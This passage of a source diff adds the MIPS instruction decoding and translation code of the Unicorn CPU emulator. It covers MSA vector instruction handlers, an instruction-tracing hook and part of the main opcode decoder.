OPC_FSULT_df: + gen_helper_msa_fsult_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMIN_A_df: + gen_helper_msa_fmin_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MADDR_Q_df: + tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); + gen_helper_msa_maddr_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSLE_df: + gen_helper_msa_fsle_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMAX_df: + gen_helper_msa_fmax_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MSUBR_Q_df: + tcg_gen_movi_i32(tcg_ctx, tdf, df + 1); + gen_helper_msa_msubr_q_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FSULE_df: + gen_helper_msa_fsule_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_FMAX_A_df: + gen_helper_msa_fmax_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, 
tws); + tcg_temp_free_i32(tcg_ctx, twt); + tcg_temp_free_i32(tcg_ctx, tdf); +} + +static void gen_msa_2r(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_2R(op) (MASK_MSA_MINOR(op) | (op & (0x1f << 21)) | \ + (op & (0x7 << 18))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t wt = (ctx->opcode >> 16) & 0x1f; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + uint8_t df = (ctx->opcode >> 16) & 0x3; + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); + + switch (MASK_MSA_2R(ctx->opcode)) { + case OPC_FILL_df: +#if !defined(TARGET_MIPS64) + /* Double format valid only for MIPS64 */ + if (df == DF_DOUBLE) { + generate_exception(ctx, EXCP_RI); + break; + } +#endif + gen_helper_msa_fill_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); /* trs */ + break; + case OPC_PCNT_df: + gen_helper_msa_pcnt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_NLOC_df: + gen_helper_msa_nloc_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_NLZC_df: + gen_helper_msa_nlzc_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, twt); + tcg_temp_free_i32(tcg_ctx, tdf); +} + +static void gen_msa_2rf(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_2RF(op) (MASK_MSA_MINOR(op) | (op & (0x1f << 21)) | \ + (op & (0xf << 17))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t wt = (ctx->opcode >> 16) & 0x1f; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + uint8_t df = (ctx->opcode >> 16) & 0x1; + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); + /* adjust df value for 
floating-point instruction */ + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df + 2); + + switch (MASK_MSA_2RF(ctx->opcode)) { + case OPC_FCLASS_df: + gen_helper_msa_fclass_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FTRUNC_S_df: + gen_helper_msa_ftrunc_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FTRUNC_U_df: + gen_helper_msa_ftrunc_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FSQRT_df: + gen_helper_msa_fsqrt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FRSQRT_df: + gen_helper_msa_frsqrt_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FRCP_df: + gen_helper_msa_frcp_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FRINT_df: + gen_helper_msa_frint_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FLOG2_df: + gen_helper_msa_flog2_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FEXUPL_df: + gen_helper_msa_fexupl_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FEXUPR_df: + gen_helper_msa_fexupr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FFQL_df: + gen_helper_msa_ffql_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FFQR_df: + gen_helper_msa_ffqr_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FTINT_S_df: + gen_helper_msa_ftint_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FTINT_U_df: + gen_helper_msa_ftint_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FFINT_S_df: + gen_helper_msa_ffint_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + case OPC_FFINT_U_df: + gen_helper_msa_ffint_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws); + break; + } + + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, twt); + tcg_temp_free_i32(tcg_ctx, tdf); +} + +static void gen_msa_vec_v(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_VEC(op) (MASK_MSA_MINOR(op) 
| (op & (0x1f << 21))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t wt = (ctx->opcode >> 16) & 0x1f; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); + + switch (MASK_MSA_VEC(ctx->opcode)) { + case OPC_AND_V: + gen_helper_msa_and_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + case OPC_OR_V: + gen_helper_msa_or_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + case OPC_NOR_V: + gen_helper_msa_nor_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + case OPC_XOR_V: + gen_helper_msa_xor_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + case OPC_BMNZ_V: + gen_helper_msa_bmnz_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + case OPC_BMZ_V: + gen_helper_msa_bmz_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + case OPC_BSEL_V: + gen_helper_msa_bsel_v(tcg_ctx, tcg_ctx->cpu_env, twd, tws, twt); + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, twt); +} + +static void gen_msa_vec(CPUMIPSState *env, DisasContext *ctx) +{ + switch (MASK_MSA_VEC(ctx->opcode)) { + case OPC_AND_V: + case OPC_OR_V: + case OPC_NOR_V: + case OPC_XOR_V: + case OPC_BMNZ_V: + case OPC_BMZ_V: + case OPC_BSEL_V: + gen_msa_vec_v(env, ctx); + break; + case OPC_MSA_2R: + gen_msa_2r(env, ctx); + break; + case OPC_MSA_2RF: + gen_msa_2rf(env, ctx); + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void gen_msa(CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint32_t opcode = ctx->opcode; + check_insn(ctx, ASE_MSA); + check_msa_access(ctx); + + switch (MASK_MSA_MINOR(opcode)) { + case OPC_MSA_I8_00: + case OPC_MSA_I8_01: + case OPC_MSA_I8_02: + 
gen_msa_i8(env, ctx); + break; + case OPC_MSA_I5_06: + case OPC_MSA_I5_07: + gen_msa_i5(env, ctx); + break; + case OPC_MSA_BIT_09: + case OPC_MSA_BIT_0A: + gen_msa_bit(env, ctx); + break; + case OPC_MSA_3R_0D: + case OPC_MSA_3R_0E: + case OPC_MSA_3R_0F: + case OPC_MSA_3R_10: + case OPC_MSA_3R_11: + case OPC_MSA_3R_12: + case OPC_MSA_3R_13: + case OPC_MSA_3R_14: + case OPC_MSA_3R_15: + gen_msa_3r(env, ctx); + break; + case OPC_MSA_ELM: + gen_msa_elm(env, ctx); + break; + case OPC_MSA_3RF_1A: + case OPC_MSA_3RF_1B: + case OPC_MSA_3RF_1C: + gen_msa_3rf(env, ctx); + break; + case OPC_MSA_VEC: + gen_msa_vec(env, ctx); + break; + case OPC_LD_B: + case OPC_LD_H: + case OPC_LD_W: + case OPC_LD_D: + case OPC_ST_B: + case OPC_ST_H: + case OPC_ST_W: + case OPC_ST_D: + { + int32_t s10 = sextract32(ctx->opcode, 16, 10); + uint8_t rs = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + uint8_t df = (ctx->opcode >> 0) & 0x3; + + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 trs = tcg_const_i32(tcg_ctx, rs); + TCGv_i32 ts10 = tcg_const_i32(tcg_ctx, s10); + + switch (MASK_MSA_MINOR(opcode)) { + case OPC_LD_B: + case OPC_LD_H: + case OPC_LD_W: + case OPC_LD_D: + gen_helper_msa_ld_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, trs, ts10); + break; + case OPC_ST_B: + case OPC_ST_H: + case OPC_ST_W: + case OPC_ST_D: + gen_helper_msa_st_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, trs, ts10); + break; + } + + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tdf); + tcg_temp_free_i32(tcg_ctx, trs); + tcg_temp_free_i32(tcg_ctx, ts10); + } + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +// Unicorn: trace this instruction on request +static void hook_insn(CPUMIPSState *env, DisasContext *ctx, bool *insn_need_patch, int *insn_patch_offset, int offset_value) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, ctx->pc)) 
{ + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_CODE_IDX, env->uc, ctx->pc); + *insn_need_patch = true; + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + *insn_patch_offset = offset_value; + } +} + +static void decode_opc (CPUMIPSState *env, DisasContext *ctx, bool *insn_need_patch, int *insn_patch_offset) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; +#if defined(TARGET_MIPS64) + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; +#endif + int32_t offset; + int rs, rt, rd, sa; + uint32_t op, op1; + int16_t imm; + + /* make sure instructions are on a word boundary */ + if (ctx->pc & 0x3) { + env->CP0_BadVAddr = ctx->pc; + generate_exception_err(ctx, EXCP_AdEL, EXCP_INST_NOTAVAIL); + return; + } + + /* Handle blikely not taken case */ + if ((ctx->hflags & MIPS_HFLAG_BMASK_BASE) == MIPS_HFLAG_BL) { + int l1 = gen_new_label(tcg_ctx); + + MIPS_DEBUG("blikely condition (" TARGET_FMT_lx ")", ctx->pc + 4); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, *(TCGv *)tcg_ctx->bcond, 0, l1); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->hflags, ctx->hflags & ~MIPS_HFLAG_BMASK); + gen_goto_tb(ctx, 1, ctx->pc + 4); + gen_set_label(tcg_ctx, l1); + hook_insn(env, ctx, insn_need_patch, insn_patch_offset, 14); + } else { + hook_insn(env, ctx, insn_need_patch, insn_patch_offset, 1); + } + + if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP | CPU_LOG_TB_OP_OPT))) { + tcg_gen_debug_insn_start(tcg_ctx, ctx->pc); + } + + op = MASK_OP_MAJOR(ctx->opcode); + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 6) & 0x1f; + imm = (int16_t)ctx->opcode; + switch (op) { + case OPC_SPECIAL: + decode_opc_special(env, ctx); + break; + case OPC_SPECIAL2: + decode_opc_special2_legacy(env, ctx); + break; + case OPC_SPECIAL3: + decode_opc_special3(env, ctx); + break; + case OPC_REGIMM: + op1 = MASK_REGIMM(ctx->opcode); + switch (op1) { + case OPC_BLTZL: /* REGIMM branches */ + case OPC_BGEZL: + case OPC_BLTZALL: 
+ case OPC_BGEZALL: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_BLTZ: + case OPC_BGEZ: + gen_compute_branch(ctx, op1, 4, rs, -1, (uint32_t)imm << 2, 4); + break; + case OPC_BLTZAL: + case OPC_BGEZAL: + if (ctx->insn_flags & ISA_MIPS32R6) { + if (rs == 0) { + /* OPC_NAL, OPC_BAL */ + gen_compute_branch(ctx, op1, 4, 0, -1, (uint32_t)imm << 2, 4); + } else { + generate_exception(ctx, EXCP_RI); + } + } else { + gen_compute_branch(ctx, op1, 4, rs, -1, (uint32_t)imm << 2, 4); + } + break; + case OPC_TGEI: case OPC_TGEIU: case OPC_TLTI: case OPC_TLTIU: case OPC_TEQI: /* REGIMM traps */ + case OPC_TNEI: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + gen_trap(ctx, op1, rs, -1, imm); + break; + case OPC_SYNCI: + check_insn(ctx, ISA_MIPS32R2); + /* Break the TB to be able to sync copied instructions + immediately */ + ctx->bstate = BS_STOP; + break; + case OPC_BPOSGE32: /* MIPS DSP branch */ +#if defined(TARGET_MIPS64) + case OPC_BPOSGE64: +#endif + check_dsp(ctx); + gen_compute_branch(ctx, op1, 4, -1, -2, (uint32_t)imm << 2, 4); + break; +#if defined(TARGET_MIPS64) + case OPC_DAHI: + check_insn(ctx, ISA_MIPS32R6); + check_mips_64(ctx); + if (rs != 0) { + tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rs], *cpu_gpr[rs], (int64_t)imm << 32); + } + MIPS_DEBUG("dahi %s, %04x", regnames[rs], imm); + break; + case OPC_DATI: + check_insn(ctx, ISA_MIPS32R6); + check_mips_64(ctx); + if (rs != 0) { + tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rs], *cpu_gpr[rs], (int64_t)imm << 48); + } + MIPS_DEBUG("dati %s, %04x", regnames[rs], imm); + break; +#endif + default: /* Invalid */ + MIPS_INVAL("regimm"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_CP0: + check_cp0_enabled(ctx); + op1 = MASK_CP0(ctx->opcode); + switch (op1) { + case OPC_MFC0: + case OPC_MTC0: + case OPC_MFTR: + case OPC_MTTR: +#if defined(TARGET_MIPS64) + case OPC_DMFC0: + case OPC_DMTC0: +#endif +#ifndef CONFIG_USER_ONLY + gen_cp0(env, ctx, op1, rt, rd); +#endif /* !CONFIG_USER_ONLY */ + break; + case 
OPC_C0_FIRST: case OPC_C0_LAST: +#ifndef CONFIG_USER_ONLY + gen_cp0(env, ctx, MASK_C0(ctx->opcode), rt, rd); +#endif /* !CONFIG_USER_ONLY */ + break; + case OPC_MFMC0: +#ifndef CONFIG_USER_ONLY + { + uint32_t op2; + TCGv t0 = tcg_temp_new(tcg_ctx); + + op2 = MASK_MFMC0(ctx->opcode); + switch (op2) { + case OPC_DMT: + check_insn(ctx, ASE_MT); + gen_helper_dmt(tcg_ctx, t0); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case OPC_EMT: + check_insn(ctx, ASE_MT); + gen_helper_emt(tcg_ctx, t0); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case OPC_DVPE: + check_insn(ctx, ASE_MT); + gen_helper_dvpe(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case OPC_EVPE: + check_insn(ctx, ASE_MT); + gen_helper_evpe(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case OPC_DI: + check_insn(ctx, ISA_MIPS32R2); + save_cpu_state(ctx, 1); + gen_helper_di(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + case OPC_EI: + check_insn(ctx, ISA_MIPS32R2); + save_cpu_state(ctx, 1); + gen_helper_ei(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + /* Stop translation as we may have switched the execution mode */ + ctx->bstate = BS_STOP; + break; + default: /* Invalid */ + MIPS_INVAL("mfmc0"); + generate_exception(ctx, EXCP_RI); + break; + } + tcg_temp_free(tcg_ctx, t0); + } +#endif /* !CONFIG_USER_ONLY */ + break; + case OPC_RDPGPR: + check_insn(ctx, ISA_MIPS32R2); + gen_load_srsgpr(ctx, rt, rd); + break; + case OPC_WRPGPR: + check_insn(ctx, ISA_MIPS32R2); + gen_store_srsgpr(ctx, rt, rd); + break; + default: + MIPS_INVAL("cp0"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_BOVC: /* OPC_BEQZALC, OPC_BEQC, OPC_ADDI */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_BOVC, OPC_BEQZALC, OPC_BEQC */ + gen_compute_compact_branch(ctx, op, rs, rt, (uint32_t)imm << 2); + } else { + /* 
OPC_ADDI */ + /* Arithmetic with immediate opcode */ + gen_arith_imm(ctx, op, rt, rs, imm); + } + break; + case OPC_ADDIU: + gen_arith_imm(ctx, op, rt, rs, imm); + break; + case OPC_SLTI: /* Set on less than with immediate opcode */ + case OPC_SLTIU: + gen_slt_imm(ctx, op, rt, rs, imm); + break; + case OPC_ANDI: /* Arithmetic with immediate opcode */ + case OPC_LUI: /* OPC_AUI */ + case OPC_ORI: + case OPC_XORI: + gen_logic_imm(ctx, op, rt, rs, imm); + break; + case OPC_J: case OPC_JAL: /* Jump */ + offset = (int32_t)(ctx->opcode & 0x3FFFFFF) << 2; + gen_compute_branch(ctx, op, 4, rs, rt, offset, 4); + break; + /* Branch */ + case OPC_BLEZC: /* OPC_BGEZC, OPC_BGEC, OPC_BLEZL */ + if (ctx->insn_flags & ISA_MIPS32R6) { + if (rt == 0) { + generate_exception(ctx, EXCP_RI); + break; + } + /* OPC_BLEZC, OPC_BGEZC, OPC_BGEC */ + gen_compute_compact_branch(ctx, op, rs, rt, (uint32_t)imm << 2); + } else { + /* OPC_BLEZL */ + gen_compute_branch(ctx, op, 4, rs, rt, (uint32_t)imm << 2, 4); + } + break; + case OPC_BGTZC: /* OPC_BLTZC, OPC_BLTC, OPC_BGTZL */ + if (ctx->insn_flags & ISA_MIPS32R6) { + if (rt == 0) { + generate_exception(ctx, EXCP_RI); + break; + } + /* OPC_BGTZC, OPC_BLTZC, OPC_BLTC */ + gen_compute_compact_branch(ctx, op, rs, rt, (uint32_t)imm << 2); + } else { + /* OPC_BGTZL */ + gen_compute_branch(ctx, op, 4, rs, rt, (uint32_t)imm << 2, 4); + } + break; + case OPC_BLEZALC: /* OPC_BGEZALC, OPC_BGEUC, OPC_BLEZ */ + if (rt == 0) { + /* OPC_BLEZ */ + gen_compute_branch(ctx, op, 4, rs, rt, (uint32_t)imm << 2, 4); + } else { + check_insn(ctx, ISA_MIPS32R6); + /* OPC_BLEZALC, OPC_BGEZALC, OPC_BGEUC */ + gen_compute_compact_branch(ctx, op, rs, rt, (uint32_t)imm << 2); + } + break; + case OPC_BGTZALC: /* OPC_BLTZALC, OPC_BLTUC, OPC_BGTZ */ + if (rt == 0) { + /* OPC_BGTZ */ + gen_compute_branch(ctx, op, 4, rs, rt, (uint32_t)imm << 2, 4); + } else { + check_insn(ctx, ISA_MIPS32R6); + /* OPC_BGTZALC, OPC_BLTZALC, OPC_BLTUC */ + gen_compute_compact_branch(ctx, op, rs, rt, 
(uint32_t)imm << 2); + } + break; + case OPC_BEQL: + case OPC_BNEL: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_BEQ: + case OPC_BNE: + gen_compute_branch(ctx, op, 4, rs, rt, (uint32_t)imm << 2, 4); + break; + case OPC_LWL: /* Load and stores */ + case OPC_LWR: + case OPC_LL: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_LB: case OPC_LH: + case OPC_LW: case OPC_LBU: case OPC_LHU: + gen_ld(ctx, op, rt, rs, imm); + break; + case OPC_SWL: + case OPC_SWR: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_SB: case OPC_SH: + case OPC_SW: + gen_st(ctx, op, rt, rs, imm); + break; + case OPC_SC: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + gen_st_cond(ctx, op, rt, rs, imm); + break; + case OPC_CACHE: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + check_cp0_enabled(ctx); + check_insn(ctx, ISA_MIPS3 | ISA_MIPS32); + /* Treat as NOP. */ + break; + case OPC_PREF: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + check_insn(ctx, ISA_MIPS4 | ISA_MIPS32); + /* Treat as NOP. */ + break; + + /* Floating point (COP1). 
*/ + case OPC_LWC1: + case OPC_LDC1: + case OPC_SWC1: + case OPC_SDC1: + gen_cop1_ldst(ctx, op, rt, rs, imm); + break; + + case OPC_CP1: + op1 = MASK_CP1(ctx->opcode); + + switch (op1) { + case OPC_MFHC1: + case OPC_MTHC1: + check_cp1_enabled(ctx); + check_insn(ctx, ISA_MIPS32R2); + case OPC_MFC1: + case OPC_CFC1: + case OPC_MTC1: + case OPC_CTC1: + check_cp1_enabled(ctx); + gen_cp1(ctx, op1, rt, rd); + break; +#if defined(TARGET_MIPS64) + case OPC_DMFC1: + case OPC_DMTC1: + check_cp1_enabled(ctx); + check_insn(ctx, ISA_MIPS3); + gen_cp1(ctx, op1, rt, rd); + break; +#endif + case OPC_BC1EQZ: /* OPC_BC1ANY2 */ + check_cp1_enabled(ctx); + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_BC1EQZ */ + gen_compute_branch1_r6(ctx, MASK_CP1(ctx->opcode), + rt, ((uint16_t)imm) << 2); + } else { + /* OPC_BC1ANY2 */ + check_cop1x(ctx); + check_insn(ctx, ASE_MIPS3D); + gen_compute_branch1(ctx, MASK_BC1(ctx->opcode), + (rt >> 2) & 0x7, ((uint32_t)imm) << 2); + } + break; + case OPC_BC1NEZ: + check_cp1_enabled(ctx); + check_insn(ctx, ISA_MIPS32R6); + gen_compute_branch1_r6(ctx, MASK_CP1(ctx->opcode), + rt, ((uint16_t)imm) << 2); + break; + case OPC_BC1ANY4: + check_cp1_enabled(ctx); + check_insn_opc_removed(ctx, ISA_MIPS32R6); + check_cop1x(ctx); + check_insn(ctx, ASE_MIPS3D); + /* fall through */ + case OPC_BC1: + check_cp1_enabled(ctx); + check_insn_opc_removed(ctx, ISA_MIPS32R6); + gen_compute_branch1(ctx, MASK_BC1(ctx->opcode), + (rt >> 2) & 0x7, (uint32_t)imm << 2); + break; + case OPC_PS_FMT: + check_cp1_enabled(ctx); + check_insn_opc_removed(ctx, ISA_MIPS32R6); + case OPC_S_FMT: + case OPC_D_FMT: + check_cp1_enabled(ctx); + gen_farith(ctx, ctx->opcode & FOP(0x3f, 0x1f), rt, rd, sa, + (imm >> 8) & 0x7); + break; + case OPC_W_FMT: + case OPC_L_FMT: + { + int r6_op = ctx->opcode & FOP(0x3f, 0x1f); + check_cp1_enabled(ctx); + if (ctx->insn_flags & ISA_MIPS32R6) { + switch (r6_op) { + case R6_OPC_CMP_AF_S: + case R6_OPC_CMP_UN_S: + case R6_OPC_CMP_EQ_S: + case R6_OPC_CMP_UEQ_S: 
+ case R6_OPC_CMP_LT_S: + case R6_OPC_CMP_ULT_S: + case R6_OPC_CMP_LE_S: + case R6_OPC_CMP_ULE_S: + case R6_OPC_CMP_SAF_S: + case R6_OPC_CMP_SUN_S: + case R6_OPC_CMP_SEQ_S: + case R6_OPC_CMP_SEUQ_S: + case R6_OPC_CMP_SLT_S: + case R6_OPC_CMP_SULT_S: + case R6_OPC_CMP_SLE_S: + case R6_OPC_CMP_SULE_S: + case R6_OPC_CMP_OR_S: + case R6_OPC_CMP_UNE_S: + case R6_OPC_CMP_NE_S: + case R6_OPC_CMP_SOR_S: + case R6_OPC_CMP_SUNE_S: + case R6_OPC_CMP_SNE_S: + gen_r6_cmp_s(ctx, ctx->opcode & 0x1f, rt, rd, sa); + break; + case R6_OPC_CMP_AF_D: + case R6_OPC_CMP_UN_D: + case R6_OPC_CMP_EQ_D: + case R6_OPC_CMP_UEQ_D: + case R6_OPC_CMP_LT_D: + case R6_OPC_CMP_ULT_D: + case R6_OPC_CMP_LE_D: + case R6_OPC_CMP_ULE_D: + case R6_OPC_CMP_SAF_D: + case R6_OPC_CMP_SUN_D: + case R6_OPC_CMP_SEQ_D: + case R6_OPC_CMP_SEUQ_D: + case R6_OPC_CMP_SLT_D: + case R6_OPC_CMP_SULT_D: + case R6_OPC_CMP_SLE_D: + case R6_OPC_CMP_SULE_D: + case R6_OPC_CMP_OR_D: + case R6_OPC_CMP_UNE_D: + case R6_OPC_CMP_NE_D: + case R6_OPC_CMP_SOR_D: + case R6_OPC_CMP_SUNE_D: + case R6_OPC_CMP_SNE_D: + gen_r6_cmp_d(ctx, ctx->opcode & 0x1f, rt, rd, sa); + break; + default: + gen_farith(ctx, ctx->opcode & FOP(0x3f, 0x1f), rt, rd, sa, + (imm >> 8) & 0x7); + break; + } + } else { + gen_farith(ctx, ctx->opcode & FOP(0x3f, 0x1f), rt, rd, sa, + (imm >> 8) & 0x7); + } + break; + } + case OPC_BZ_V: + case OPC_BNZ_V: + case OPC_BZ_B: + case OPC_BZ_H: + case OPC_BZ_W: + case OPC_BZ_D: + case OPC_BNZ_B: + case OPC_BNZ_H: + case OPC_BNZ_W: + case OPC_BNZ_D: + check_insn(ctx, ASE_MSA); + gen_msa_branch(env, ctx, op1); + break; + default: + MIPS_INVAL("cp1"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + + /* Compact branches [R6] and COP2 [non-R6] */ + case OPC_BC: /* OPC_LWC2 */ + case OPC_BALC: /* OPC_SWC2 */ + if (ctx->insn_flags & ISA_MIPS32R6) { + /* OPC_BC, OPC_BALC */ + gen_compute_compact_branch(ctx, op, 0, 0, + sextract32(ctx->opcode << 2, 0, 28)); + } else { + /* OPC_LWC2, OPC_SWC2 */ + /* COP2: Not implemented. 
*/ + generate_exception_err(ctx, EXCP_CpU, 2); + } + break; + case OPC_BEQZC: /* OPC_JIC, OPC_LDC2 */ + case OPC_BNEZC: /* OPC_JIALC, OPC_SDC2 */ + if (ctx->insn_flags & ISA_MIPS32R6) { + if (rs != 0) { + /* OPC_BEQZC, OPC_BNEZC */ + gen_compute_compact_branch(ctx, op, rs, 0, + sextract32(ctx->opcode << 2, 0, 23)); + } else { + /* OPC_JIC, OPC_JIALC */ + gen_compute_compact_branch(ctx, op, 0, rt, imm); + } + } else { + /* OPC_LWC2, OPC_SWC2 */ + /* COP2: Not implemented. */ + generate_exception_err(ctx, EXCP_CpU, 2); + } + break; + case OPC_CP2: + check_insn(ctx, INSN_LOONGSON2F); + /* Note that these instructions use different fields. */ + gen_loongson_multimedia(ctx, sa, rd, rt); + break; + + case OPC_CP3: + check_insn_opc_removed(ctx, ISA_MIPS32R6); + if (ctx->CP0_Config1 & (1 << CP0C1_FP)) { + check_cp1_enabled(ctx); + op1 = MASK_CP3(ctx->opcode); + switch (op1) { + case OPC_LWXC1: + case OPC_LDXC1: + case OPC_LUXC1: + case OPC_SWXC1: + case OPC_SDXC1: + case OPC_SUXC1: + gen_flt3_ldst(ctx, op1, sa, rd, rs, rt); + break; + case OPC_PREFX: + /* Treat as NOP. 
